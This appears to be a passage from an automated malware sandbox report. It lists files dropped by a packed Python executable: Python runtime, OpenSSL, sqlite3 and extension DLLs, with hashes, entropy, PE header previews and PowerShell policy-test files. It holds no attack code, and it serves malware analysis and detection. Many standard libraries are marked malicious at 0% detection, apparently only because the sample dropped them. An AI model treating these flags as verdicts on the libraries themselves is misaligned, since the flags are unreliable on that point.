                                                                                                                                                                                                                                  Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2229248
                                                                                                                                                                                                                                  Entropy (8bit):7.999624400419257
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:49152:EbSlg7EtPbwG7Qtugc58UQG/0ym73KDYo/6cUWnyO:gSCkwG7Gub8URsF6YoPUE
                                                                                                                                                                                                                                  MD5:27BFDC1A00EB382F490991A6507CC3F2
                                                                                                                                                                                                                                  SHA1:162BC0DDF111968BFD69246660CF650F89B5B7BC
                                                                                                                                                                                                                                  SHA-256:788D5C28A70E2BC4E695C827AEC70E0869AD7BFDD1F0F4F75231D6F8D83450C2
                                                                                                                                                                                                                                  SHA-512:6FCC538C0F901F8543CF296B981A68EB6271F72DDCD106B69B45E0EBD166A355299CE23E999AA855D23EDD69F95F53B653F92772435A42C72001386CDB423899
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.b.6...6...6...?..$...&9..4...&9..2...&9..>...&9..'...}...8...Y<..5...6...2...~8..I...6.......~8..7...~8..7...Rich6...........PE..d......g.........." ...)..".......V.0wx...V...................................x...........`...........................................x.......x.............. s...............x.$...........................H.x.(.....x.@...........................................UPX0......V.............................UPX1......"...V...!.................@...UPX2..........x.......!.............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                  Entropy (8bit):7.7995124290500275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:hPNW72j7kwZzAJh1wX7d6/FS7JFm8kzVQKScRtydjjiUBmqloARt/wy2JpUk:hPom7Hsf1wX49S7J+fyd3iUBmrARH2wk
                                                                                                                                                                                                                                  MD5:6106B4D1EEC11D2A71DEF28D2A2AFA46
                                                                                                                                                                                                                                  SHA1:E10039EFF42F88A2CD8DFE11D428C35F6178C6CE
                                                                                                                                                                                                                                  SHA-256:19B144F1BFEB38F5A88DA4471D0E9EEEFCEE979E0D574ECF13A28D06BDF7F1DA
                                                                                                                                                                                                                                  SHA-512:D08BA0CF57D533CE2DF7027158329DA66518FB1BF10220D836CE39BDF8BC0436DFC3A649CF937B3B3E2BB9FF0D3C9E964416E9AC965CFF4B24BD203067F53D43
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._5..1f..1f..1f.f..1f..0g..1f..0g..1f..4g..1f..5g..1f..2g..1f..0g..1f..0fS.1f.q9g..1f.q1g..1f.q.f..1f.q3g..1fRich..1f........................PE..d.....{e.........." ...%.........0.......@................................................`.............................................h....................p..4.......................................................@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1105816
                                                                                                                                                                                                                                  Entropy (8bit):7.937977313955466
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:Ak3UseOkUaIS1Ufk9yI9EBrXvkKTfropEOdo89kASpQY32Za1CPwDv3uFfJW:Ak3U0aIS1Uc9yoEZlTfMpE9lT1CPwDvX
                                                                                                                                                                                                                                  MD5:5E999BC10636935A56A26B623718D4BE
                                                                                                                                                                                                                                  SHA1:378622EB481006983F14607FDCE99641D161F244
                                                                                                                                                                                                                                  SHA-256:35460FC9FD3BAC20826A5BD7608CBE71822AC172E014A6B0E0693BD1B6E255C1
                                                                                                                                                                                                                                  SHA-512:D28ECC0F001B91C06FE4572AD18EB49CB0C81C2B3496725D69F6F82ECCD992047ECD5819E05E4F7BF786904B6C2E5D68FECC629FA50425A7D7ABD9FE33C0052A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ..............&.`D5...&..................................p7...........`......................................... h5......c5.h....`5......p2.8............h7.....................................xP5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc........`5.....................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24088
                                                                                                                                                                                                                                  Entropy (8bit):7.527291720504194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:9RZBxuj5W4IBzuU2CUvOEvba4Za7gJXkrZRCXEpnYPLxDG4y80uzFLhHj:fwlGuUm2Evb1p07pWDG4yKRF
                                                                                                                                                                                                                                  MD5:D50EBF567149EAD9D88933561CB87D09
                                                                                                                                                                                                                                  SHA1:171DF40E4187EBBFDF9AA1D76A33F769FB8A35ED
                                                                                                                                                                                                                                  SHA-256:6AA8E12CE7C8AD52DD2E3FABEB38A726447849669C084EA63D8E322A193033AF
                                                                                                                                                                                                                                  SHA-512:7BCC9D6D3A097333E1E4B2B23C81EA1B5DB7DBDC5D9D62EBAFFB0FDFB6CFE86161520AC14DC835D1939BE22B9F342531F48DA70F765A60B8E2C3D7B9983021DE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....@................................................................`.........................................................................................................................................................................UPX0....................................UPX1.....@.......:..................@...UPX2.................>..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):205216
                                                                                                                                                                                                                                  Entropy (8bit):7.9213750503510605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:74A92MK5MfGhqR1qnW/Bby+h0lE4GIp8/Mgfg68oPrRHUy1oygvaO9JSj8Hrd+/g:tSMehqKnEKlEARNYRP1lgl9jHrw/BgX
                                                                                                                                                                                                                                  MD5:8D8D9C30250F7042D25D73B9822EFC45
                                                                                                                                                                                                                                  SHA1:F6B83A793175E77F6E8A6ADD37204115DA8CB319
                                                                                                                                                                                                                                  SHA-256:92BF5BDC30C53D52AB53B4F51E5F36F5B8BE1235E7929590A9FDDC86819DBA1D
                                                                                                                                                                                                                                  SHA-512:ED40078D289B4293F4E22396F5B7D3016DAEC76A4406444CCD0A8B33D9C939A6F3274B4028B1C85914B32E69FC00C50EC9A710738746C9EE9962F86D99455BDF
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.T.?.:.?.:.?.:.6f..3.:.]f;.=.:..l;.=.:.]f?.3.:.]f>.7.:.]f9.;.:..g;.<.:.?.;...:..g>...:..g:.>.:..g.>.:..g8.>.:.Rich?.:.........PE..d.....0b.........." .........P...P..@....`...................................p............`..........................................&..4@...#....... ..........|M...........f......................................@...@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc....P... ...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                  Entropy (8bit):7.615547793921446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:3fCinCNIw61COjZ0FbIj/jvIUrn+HHRCkmJeZMF50aEB1lr9Za7gJXnkg8:3a1D6vjZd1SxCjeZM0TBhpXk
                                                                                                                                                                                                                                  MD5:7F691747CE66D3ED05A7C2C53220C8B5
                                                                                                                                                                                                                                  SHA1:1D3F247042030CF8CF7C859002941BEBA5D15776
                                                                                                                                                                                                                                  SHA-256:7D6472A0D7F1A0740C7FC0D0D0EA6F7C6E7CB2B11B8C623C46A6FAE1ADB4E228
                                                                                                                                                                                                                                  SHA-512:B01F0E91039FC5B2782CAAA0B3D56D5D1FE9E94424CC536CDE9ECA73A76747736060042E345AF9EDC5EF5BF5C154705D2C2DDDF35536F305306BE25A955A9F06
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.T.............v?............v........................&{................................S.............Rich............PE..d....|.f.........." ...).P...................................................@............`.........................................@2..d....0..P....0.......................2.......................................&..@...........................................UPX0....................................UPX1.....P.......H..................@....rsrc........0.......L..............@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                  Entropy (8bit):7.775419500820849
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:+aXim60eBsX5cAR0NOhDEuU8dP0LAZ2dP97MxpRz:+aXi0eB45cAASDEuNd8LAZ2p97M9
                                                                                                                                                                                                                                  MD5:FD362FC501DDBFA28004E0D5C8DF6DD2
                                                                                                                                                                                                                                  SHA1:7DDEF836354BEE5222C2BF65ED321E4E6254310A
                                                                                                                                                                                                                                  SHA-256:CC2D201DFA2DFA430505E88BE8D61F69B275CB3EB27E7A32EBF2F95D890709B3
                                                                                                                                                                                                                                  SHA-512:A9D87B27454640B8F78E934BAF0F8D4781739FC1BB6DE2B82B9AD0E11DF7ACA5D291EA6395289E4313BF5AB89225DB5EF3085C945E01DDE81BC2A73CE6591761
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.T.............v?..............v..............................b{...........................S...........Rich....................PE..d......g.........." ...)................. ................................................`.........................................@...d......P............@..l.......................................................@...........................................UPX0....................................UPX1......... ...x..................@....rsrc................|..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):84944
                                                                                                                                                                                                                                  Entropy (8bit):7.900884588506288
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yIRpMj+g2d8XnyAthTgPXBgdc4dAc9RQEp3UjIpQhub7SyfA:JROKWny+ZhpR3lwIpQhubG
                                                                                                                                                                                                                                  MD5:13DAB8A6EF861842F835940AC87A9204
                                                                                                                                                                                                                                  SHA1:B1D0B8D080A83F11467EF23A487A2B140C5B4325
                                                                                                                                                                                                                                  SHA-256:57A561945943DE9D06ED0A8C16699D0E28D38EC696A354FE8735A3DE6518EC0B
                                                                                                                                                                                                                                  SHA-512:12A020130711BD17A2A1C12BEAEB239040EC17A6742382546E044155A57736BFBB8FD95D30D08FD5B52BC4488CADC149708B253006B4C2CA26F84266869FA64A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B.J.B.J.B.J.::J.B.J.7.K.B.J.7.K.B.J.7.K.B.J.7.K.B.J`7.K.B.J.0.K.B.J.B.J.B.J`7.K.B.J`7.K.B.J`7VJ.B.J`7.K.B.JRich.B.J........PE..d.....1b.........." ..... ..........p+... ...................................P............`..........................................L..P....I.......@.......................L......................................p7..8...........................................UPX0....................................UPX1..... ... ......................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):62416
                                                                                                                                                                                                                                  Entropy (8bit):5.967681933111472
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:pE8LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqp:pEwewnvtjnsfw7VIpQ0h7SyH
                                                                                                                                                                                                                                  MD5:F5CB0F83F8A825D4BEDCDDAE9D730804
                                                                                                                                                                                                                                  SHA1:07385F55B69660B8ABC197CFAB7580072DA320EA
                                                                                                                                                                                                                                  SHA-256:A62A9C7966CF614B3083740DC856CA9A1151DDCC0B110EBC3494799511ED392B
                                                                                                                                                                                                                                  SHA-512:2BFA35EB4B8FFF821B4504ECCAD94ED8591EF42E0CDB39A18458395789508B4D2DA76F0DE3708D963C3187B8B1CED66B37C66834F17EECA0CEB45A62B3A69974
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.....d...d...d...l...d...d...d.......d...f...d.Rich..d.................PE..d.....1b.........." ......................................................................`.........................................`...`...............................................T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1501648
                                                                                                                                                                                                                                  Entropy (8bit):7.992072954541202
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:24576:XAcLjAXdgziGhqsuwCejSlm5Jzq3aGemcSeQDeZWxxiFatEeZ5b/WZlfrgZthAiz:CXdgzsSCejSk5F6xeVSeQ3xxiFA35TKi
                                                                                                                                                                                                                                  MD5:0FF261EAEC9B2A95D5A42DD14B3EBD06
                                                                                                                                                                                                                                  SHA1:EACA11A8495D1D82754EEA1D370DB66BEEE5531A
                                                                                                                                                                                                                                  SHA-256:D83D45DBA2DC176107A17DC5EFE8C136CAB3BACDBB42426805C1A36D78242FF3
                                                                                                                                                                                                                                  SHA-512:04AB60E90BABBF53001CCC4FFD7E979FF450B232CBF1221731ECBE21CAB0BEE4A42C9FF6A53A5973F89B48085F797384A8D1218F34C48149C7B7D572FD8BF663
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4...4...4...A...4...[n..4...A...4...A...4...A...4...L...4..mF...4...4...5...A..~4...A...4...Al..4...A...4..Rich.4..................PE..d.....1b.........." .............@/..6E..P/..................................0F...........`.........................................._E......YE.d....PE......0B.............. F......................................BE.8...........................................UPX0.....@/.............................UPX1.........P/.....................@....rsrc........PE.....................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\select.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22480
                                                                                                                                                                                                                                  Entropy (8bit):7.274685542334148
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:TiRf5SV1a/55bjX4DjpJZa7gJXUGgIp7GY6dYIYiSy1pCQmwqhyX:TGxSVQvIDXpEGgIp7GY+BYiSyv4hI
                                                                                                                                                                                                                                  MD5:F6CCBB8579C0A2D3AB65F62546AB9549
                                                                                                                                                                                                                                  SHA1:9C441A78B771BD591A73AB27C6AE4A514ED356B6
                                                                                                                                                                                                                                  SHA-256:CE958B7855D3C85127A8971CC4D9C79611402AE1E05AD6B22147E9FE084DBB08
                                                                                                                                                                                                                                  SHA-512:04A0CEACCCE5010D233D2508E09AF531761CFE1CF2A55E531966C06BFCF4E4936B139CD9158B7BA680B795BD64A5E83D198C18A00F33771E3DC3A73008851CAE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... ...N...N...N.......N...O...N...K...N...J...N...M...N.O.O...N...O...N.!.O...N.O.C...N.O.N...N.O.....N.O.L...N.Rich..N.........................PE..d.....1b.........." .....0...............................................................`......................................... ...L....................`..............l..........................................8...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):626128
                                                                                                                                                                                                                                  Entropy (8bit):7.993579504289616
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:12288:aGzKl1BqBw166xh2tElkIExaDsI5HgIi0MRuQofTkFRjcdoPANBqwJceFBnub4pq:asKl/Ew166OtHxaDJJwZATkrcB9Jcgux
                                                                                                                                                                                                                                  MD5:02FFE8FBACA3A8E908615C557F4DFAE3
                                                                                                                                                                                                                                  SHA1:61DACEFBC236C99CB904ED05627EEED4FB5AB74D
                                                                                                                                                                                                                                  SHA-256:80943701E464891C4B7C9342CA3D6D8AA8D8125617C3E72C082C3FF8783F9130
                                                                                                                                                                                                                                  SHA-512:1E87843F844D4B85D688B2AAD049E941945A7E7C7D6778982BF8FAC1E8D0FEC33E63344A231A243D8C1E69C769CEF382B39311CF03ECC0732CD6FCEAFE2952F6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.v.#..@#..@#..@*.@/..@q..A!..@q..A/..@q..A+..@q..A'..@...A ..@#..@...@...A"..@...A"..@...@"..@...A"..@Rich#..@........PE..d.....1b.........." .....@...0............................................................`..............................................!..............................................................................8...........................................UPX0....................................UPX1.....@.......<..................@....rsrc....0...........@..............@......................................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):292304
                                                                                                                                                                                                                                  Entropy (8bit):7.985311163903152
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:duh9O/bLkOHHBYCxehGZDgnhcpZJdZnHqSosSLUeBSTKxe:A6/RhYseM0nCZJdNHqCGU6STKxe
                                                                                                                                                                                                                                  MD5:135C7CDDD0C42150DCCA589716C5A20B
                                                                                                                                                                                                                                  SHA1:1546E9064CFB4AB16CD8849E06BB14E613E5CA89
                                                                                                                                                                                                                                  SHA-256:EB6B2821C9B5D4421554878C6B8CBD96ED4A23CB878FF159B37C2DDD22E43BEE
                                                                                                                                                                                                                                  SHA-512:2921538FAF85CED9DC6715865958E208BFC88E7135D5009C1D648CA4A8B3ADCD548F704A783BAD62A2AD1020F8E0859EFC664AFED3C326AFC8DED484EA907EF7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,.$zhOJ)hOJ)hOJ)a7.)nOJ)::K(jOJ)::O(dOJ)::N(`OJ)::I(kOJ).:K(kOJ).=K(jOJ)hOK)9OJ).:G(iOJ).:J(iOJ).:.)iOJ).:H(iOJ)RichhOJ)................PE..d.....1b.........." .....P..........`U... ................................................`..........................................{..X....y.......p.......................{......................................`a..8...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):41984
                                                                                                                                                                                                                                  Entropy (8bit):7.860583774596857
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:cY7iGEvYJSIlYZEVifuxMiC863eHarUVbQc3VXHxbalbo0wTMp+:F7TEvYRyZ0ifXZ8WeLVbQARb0Jw9
                                                                                                                                                                                                                                  MD5:66C8816AB9B6040ED5D45C5432F93C96
                                                                                                                                                                                                                                  SHA1:78B73258E6FFF699B8B345A54E8A7C868B10DA53
                                                                                                                                                                                                                                  SHA-256:D28D9808D80B6BEE274F7E553168B1D42AD806B9D767A92E189678BC81B329D6
                                                                                                                                                                                                                                  SHA-512:847E39AD6B490B5901E07187D6DAFA8FCC50D654AE6FAEDBEFAA9759BC328581A1D9B03F0D7B997D00C3DE1A752DE451FC91837EA4700561F93389AE10766295
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..]&..&..&../..."..6K..$..m...$..6K..%..6K.....6K..*....%..&.....mJ..'..mJ..'..mJj.'..mJ..'..Rich&..........PE..d...r..g.........." ...).........`..@....p................................... ............`.............................................d...........................................................................@...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0t1faps.il3.ps1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkesy0nl.lqb.psm1

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
